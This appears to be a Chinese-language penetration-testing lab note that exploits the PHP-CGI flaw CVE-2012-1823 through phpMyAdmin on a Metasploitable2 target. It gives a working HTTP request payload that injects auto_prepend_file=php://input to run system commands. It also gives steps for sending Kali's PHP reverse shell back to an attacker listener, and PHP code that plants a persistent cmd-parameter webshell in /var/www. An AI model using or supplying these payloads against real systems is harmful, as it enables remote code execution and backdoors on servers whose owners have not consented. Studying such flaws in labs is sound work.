1、phpMyAdmin/setup
在metasploit2中,可以测试其漏洞,由于其mysql是由phpMyAdmin来管理,因此直接访问,可以看到
1.1、php根据版本直接执行调用系统命令
通过使用-d指定auto_prepend_file来制造任意文件包含漏洞,执行任意代码:
POST /phpMyAdmin/?-d+allow_url_include%3dOn+-d
+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 192.168.1.102 //要访问的服务IP地址
<?php
passthru('id'); //或者是passthru等系统执行命令
die();
?>
如果是一段执行木马,可以直接再后台运行,举例:将“abcdefghigk”写入到新建的a.php文件中,并查看
1.2、PHP反弹shell
在kali自带一些php的木马,可以拿来直接使用/usr/share/webshells/php/php-reverse-shell.php
。复制此文件到桌面为2.php,然后编辑此文件,修改其中的参数,其中IP为kali即反弹到的IP地址
修改IP地址和端口
将整个2.php文本复制到request请求中,而不是往目标服务器写入一个文件
在kali上开启监听端口
在repeater上执行go
查看结果
而作为ifconfig等命令并不能够执行,因为是用户是www-data,ifconfig不一定能够执行,该如何处理?
1.3、webshell(静态shell)
在上述的php程序中换成如下内容,此内容可以理解成木马文件,写入到1.php,然后在http访问此文件即能够执行命令。
<?php
system('echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" > /var/www/1.php')
die();
?>
访问http://192.168.1.102并将cmd=id(或其他命令)查看结果,可直接执行。
[PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析参考链接]https://www.leavesongs.com/PENETRATION/php-cgi-cve-2012-1823.html
2、PHP5-CGI
采用默认安装PHP5-CGI时,/cgi-bin/php5 和 /cgi-bin/php由于不在/var/www(网站目录)下,因此爬网是爬不出来的,但是是能够直接访问的,通过构造php程序可以执行执行。